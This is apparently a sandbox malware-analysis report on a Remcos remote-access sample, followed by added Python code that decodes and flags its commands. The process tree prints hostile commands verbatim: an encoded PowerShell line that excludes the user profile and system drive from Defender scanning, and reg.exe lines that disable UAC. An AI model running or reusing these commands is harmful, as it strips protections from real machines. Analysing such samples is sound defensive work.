Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-04-2024 08:19

General

  • Target

    f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe

  • Size

    118KB

  • MD5

    58250357e2818257885f8ab3321085c2

  • SHA1

    edec3680ec5558bad5aaed1f8dd1f5f05f8243ca

  • SHA256

    f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015

  • SHA512

    d403ca7d62033f49e07ad05a144d59a83b81bede2d98d36284974741e72df56ee0dfbdd1d5ae7eac0587ad128b81f2c50da682b28115230e20e4afff2bf07b0e

  • SSDEEP

    3072:OVjUCVOwcSlBaTPbfM+6b4UGYTX7LX9MD:AjUWcegDbfMJ+A7j9

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • UAC bypass 3 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
    "C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAaAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AeQB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYwByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcABzACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4104
    • C:\Users\Admin\AppData\Local\Temp\test.exe
      "C:\Users\Admin\AppData\Local\Temp\test.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Modifies WinLogon
      • Suspicious use of WriteProcessMemory
      PID:3960
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1332
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:5084
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4488
        • C:\Windows\SysWOW64\PING.EXE
          PING 127.0.0.1 -n 2
          4⤵
          • Runs ping.exe
          PID:2500
        • C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe
          "C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe"
          4⤵
          • Modifies WinLogon for persistence
          • Executes dropped EXE
          • Adds Run key to start application
          • Modifies WinLogon
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Windows\SysWOW64\cmd.exe
            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3448
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              6⤵
              • UAC bypass
              • Modifies registry key
              PID:2836
          • C:\Program Files (x86)\Internet Explorer\iexplore.exe
            "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
            5⤵
              PID:4060
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4280 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:1932
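The two command lines in this tree worth pulling apart are the PowerShell -EncodedCommand (PID 4104) and the reg.exe ADD run twice under cmd.exe /k (PIDs 5084 and 2836). The Python below is an added example, not part of the Triage report or of the sample: it decodes the encoded command the way powershell.exe does (Base64 of the script in UTF-16LE), strips the empty <# #> comment blocks the sample scatters between tokens, extracts the Defender exclusion paths, and parses the reg.exe command line to flag EnableLUA being set to 0. The two inputs are copied verbatim from the process tree above; the function names and the parsing approach are mine.

```python
import base64
import re

# Inputs copied from the process tree above (not new data).
ENCODED_COMMAND = (
    "PAAjAHkAaAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AeQB6"
    "ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUA"
    "cgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAj"
    "AHkAYwByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcABzACMAPgA="
)
REG_COMMAND = (
    r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"
    r"\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
)

COMMENT_BLOCK = re.compile(r"<#.*?#>", re.DOTALL)


def decode_encoded_command(b64):
    """powershell.exe -EncodedCommand takes Base64 of the script encoded as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_comment_blocks(script):
    """Drop <# ... #> block comments and collapse whitespace. The sample inserts empty
    comment blocks between tokens, so the raw script never contains the contiguous
    string 'Add-MpPreference -ExclusionPath' that a naive match would look for."""
    return " ".join(COMMENT_BLOCK.sub(" ", script).split())


def defender_exclusions(script):
    """Return the -ExclusionPath arguments of an Add-MpPreference call, or [] if none."""
    clean = strip_comment_blocks(script)
    if not re.search(r"\bAdd-MpPreference\b", clean, re.IGNORECASE):
        return []
    m = re.search(r"-ExclusionPath\s+@\(([^)]*)\)", clean, re.IGNORECASE)
    if not m:
        return []
    return [p.strip().strip("'\"") for p in m.group(1).split(",") if p.strip()]


def parse_reg_add(cmdline):
    """Parse 'reg.exe ADD <key> /v <name> /t <type> /d <data> [/f]' into a dict.
    Whitespace splitting is enough here because none of the paths contain spaces."""
    toks = cmdline.split()
    add = [i for i, t in enumerate(toks) if t.upper() == "ADD"]
    if not add or add[0] + 1 >= len(toks):
        return {}
    i = add[0]
    info = {"key": toks[i + 1], "force": False}
    names = {"/v": "value", "/t": "type", "/d": "data"}
    j = i + 2
    while j < len(toks):
        t = toks[j].lower()
        if t == "/f":
            info["force"] = True
            j += 1
        elif t in names and j + 1 < len(toks):
            info[names[t]] = toks[j + 1]
            j += 2
        else:
            j += 1
    return info


def disables_uac(info):
    r"""True when the ADD writes EnableLUA=0 under ...\Policies\System (T1548.002 / T1112)."""
    return (
        info.get("key", "").lower().endswith(r"\policies\system")
        and info.get("value", "").lower() == "enablelua"
        and info.get("data") == "0"
    )


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED_COMMAND)
    print(script)
    print(strip_comment_blocks(script))
    print("Defender exclusions:", defender_exclusions(script))
    reg = parse_reg_add(REG_COMMAND)
    print(reg, "-> disables UAC:", disables_uac(reg))
```

Two caveats when reading the signatures against this output. Writing EnableLUA under HKLM needs an elevated token and only takes effect after a reboot; the analysis ran for 143 s with no reboot, so the "UAC bypass" signature records the registry write, not an observed elevation. And the `PING 127.0.0.1 -n 2` in install.bat is the usual batch-file sleep before launching JavaUpdate.exe, which is all the "Runs ping.exe" signature reflects.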

Network

MITRE ATT&CK Matrix ATT&CK v13

Persistence

  • T1547 Boot or Logon Autostart Execution (3)
    • T1547.001 Registry Run Keys / Startup Folder (1)
    • T1547.004 Winlogon Helper DLL (2)

Privilege Escalation

  • T1547 Boot or Logon Autostart Execution (3)
    • T1547.001 Registry Run Keys / Startup Folder (1)
    • T1547.004 Winlogon Helper DLL (2)
  • T1548 Abuse Elevation Control Mechanism (1)
    • T1548.002 Bypass User Account Control (1)

Defense Evasion

  • T1112 Modify Registry (5)
  • T1548 Abuse Elevation Control Mechanism (1)
    • T1548.002 Bypass User Account Control (1)
  • T1562 Impair Defenses (1)
    • T1562.001 Disable or Modify Tools (1)

Discovery

  • T1012 Query Registry (1)
  • T1082 System Information Discovery (2)
  • T1018 Remote System Discovery (1)


      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwpkkmaj.2fy.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\install.bat
        Filesize

        158B

        MD5

        552f91e198b5402fad934b3c7a45b5c2

        SHA1

        6c766bc9d51ba70a7769047e5ae107b798e4ed12

        SHA256

        9c2b2133eb284e764155a96798efdff4e67e2ef38f9501ca4d9b066cfbf0da37

        SHA512

        47128e082b7c541360e26968d9a009e38613da06ddfa14a288d90d8ca6efe8574b67d06673e52cff30d4967c42f0b871c8bd0db4b6f1b80c2db39b8d1ae1adaf

      • C:\Users\Admin\AppData\Local\Temp\test.exe
        Filesize

        100KB

        MD5

        f3b7cddc98281485c9bcf40314a8cfa1

        SHA1

        a797b03d4f0aa176ac3c31509a612ff07c1a15d7

        SHA256

        7baa3ae97c421ab54fa95d3fceca3f11900c7fc04970652400d803da18f22122

        SHA512

        5b57a55bd40a4f57222312279989b2398bc472b57a4ca098cdbcc9456b168d9a2fefe54b3fc24ba9fcb1edb9ab60159e6887addda1285184bccb33d76010068a

      • memory/3016-0-0x0000000000010000-0x0000000000034000-memory.dmp
        Filesize

        144KB

      • memory/3016-1-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB

      • memory/3016-2-0x000000001AC70000-0x000000001AC80000-memory.dmp
        Filesize

        64KB

      • memory/3016-32-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB

      • memory/4104-11-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB

      • memory/4104-12-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp
        Filesize

        64KB

      • memory/4104-22-0x00000266E4150000-0x00000266E4172000-memory.dmp
        Filesize

        136KB

      • memory/4104-24-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp
        Filesize

        64KB

      • memory/4104-27-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp
        Filesize

        10.8MB
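The memory dump names above encode the PID, a sequence number and the dumped address range, and the Filesize under each is just end minus start. The Python below is an added example (not part of the Triage report): it parses those names, reproduces the report's size figures, and cross-references identical ranges across the parent (PID 3016) and the PowerShell child (PID 4104). The dump names are copied from the list above; the heuristic in `shared_regions` (an identical range at an identical high address in two processes is usually a system DLL mapped in both rather than an injected payload) is my assumption, not something the report states.

```python
import re
from collections import defaultdict

# Dump names copied from the Downloads list above (not new data).
DUMP_NAMES = [
    "memory/3016-0-0x0000000000010000-0x0000000000034000-memory.dmp",
    "memory/3016-1-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp",
    "memory/3016-2-0x000000001AC70000-0x000000001AC80000-memory.dmp",
    "memory/3016-32-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp",
    "memory/4104-11-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp",
    "memory/4104-12-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp",
    "memory/4104-22-0x00000266E4150000-0x00000266E4172000-memory.dmp",
    "memory/4104-24-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp",
    "memory/4104-27-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp",
]

DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_dump_name(name):
    """Split 'memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp' into fields; None if no match."""
    m = DUMP_RE.match(name)
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "seq": int(m["seq"]),
            "start": start, "end": end, "size": end - start}


def human_size(n):
    """Format the way the report does: whole KB below 1 MiB, one-decimal MB above (1024-based)."""
    if n < 1024 * 1024:
        return "%dKB" % (n // 1024)
    return "%.1fMB" % (n / (1024 * 1024))


def regions_by_process(names):
    """Map (start, end) -> sorted list of PIDs from which that exact range was dumped."""
    seen = defaultdict(set)
    for n in names:
        d = parse_dump_name(n)
        if d:
            seen[(d["start"], d["end"])].add(d["pid"])
    return {k: sorted(v) for k, v in seen.items()}


def shared_regions(names):
    """Ranges dumped from more than one process. Heuristic (my assumption): the same
    range at the same high address in parent and child is usually a shared system DLL,
    so the unique regions are the ones worth opening first."""
    return {k: v for k, v in regions_by_process(names).items() if len(v) > 1}


if __name__ == "__main__":
    for n in DUMP_NAMES:
        d = parse_dump_name(n)
        print("PID %d #%-2d %#018x-%#018x %s"
              % (d["pid"], d["seq"], d["start"], d["end"], human_size(d["size"])))
    for (s, e), pids in shared_regions(DUMP_NAMES).items():
        print("shared by %s: %#x-%#x" % (pids, s, e))
```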